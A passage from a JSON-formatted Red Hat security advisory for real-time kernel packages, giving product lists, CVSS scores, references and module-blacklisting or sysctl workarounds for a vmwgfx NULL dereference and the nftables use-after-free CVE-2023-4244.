"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1019"
},
{
"category": "workaround",
"details": "To mitigate this issue, it is possible to prevent the affected code from being loaded by blacklisting the vmwgfx kernel module. For instructions relating to blacklisting a kernel module, please see https://access.redhat.com/solutions/41278.",
"product_ids": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: vmwgfx: NULL pointer dereference in vmw_cmd_dx_define_query"
},
{
"acknowledgments": [
{
"names": [
"Bien Pham (https://sea.com)"
],
"organization": "Team Orca of Sea Security Team"
}
],
"cve": "CVE-2023-4244",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2023-08-28T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2235306"
}
],
"notes": [
{
"category": "description",
"text": "A use-after-free flaw was found in the Linux kernel\u2019s nftables sub-component due to a race problem between the set GC and transaction in the Linux Kernel. This flaw allows a local attacker to crash the system due to a missing call to `nft_set_elem_mark_busy`, causing double deactivation of the element and possibly leading to a kernel information leak problem.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: Use-after-free in nft_verdict_dump due to a race between set GC and transaction",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploiting this flaw will require CAP_NET_ADMIN access privilege in any user or network namespace.\n\nAnd,\n\nOn non-containerized deployments of Red Hat Enterprise Linux, you can disable user namespaces by setting user.max_user_namespaces to 0:\n\n$ echo \"user.max_user_namespaces=0\" \u003e /etc/sysctl.d/userns.conf\n$ sysctl -p /etc/sysctl.d/userns.conf\n\nOn containerized deployments, such as Red Hat OpenShift Container Platform, do not use this mitigation as the functionality is needed to be enabled.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-4244"
},
{
"category": "external",
"summary": "RHBZ#2235306",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2235306"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-4244",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4244"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-4244",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4244"
},
{
"category": "external",
"summary": "https://lore.kernel.org/netdev/20230810070830.24064-1-pablo@netfilter.org/",
"url": "https://lore.kernel.org/netdev/20230810070830.24064-1-pablo@netfilter.org/"
},
{
"category": "external",
"summary": "https://lore.kernel.org/netdev/20230815223011.7019-1-fw@strlen.de/",
"url": "https://lore.kernel.org/netdev/20230815223011.7019-1-fw@strlen.de/"
}
],
"release_date": "2023-08-28T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-02-28T12:36:50+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1019"
},
{
"category": "workaround",
"details": "Mitigation for this issue is to skip loading the affected module \"nftables\" onto the system till we have a fix available, this can be done by a blacklist mechanism, this will ensure the driver is not loaded at the boot time.\n~~~\nHow do I blacklist a kernel module to prevent it from loading automatically?\nhttps://access.redhat.com/solutions/41278 \n~~~",
"product_ids": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
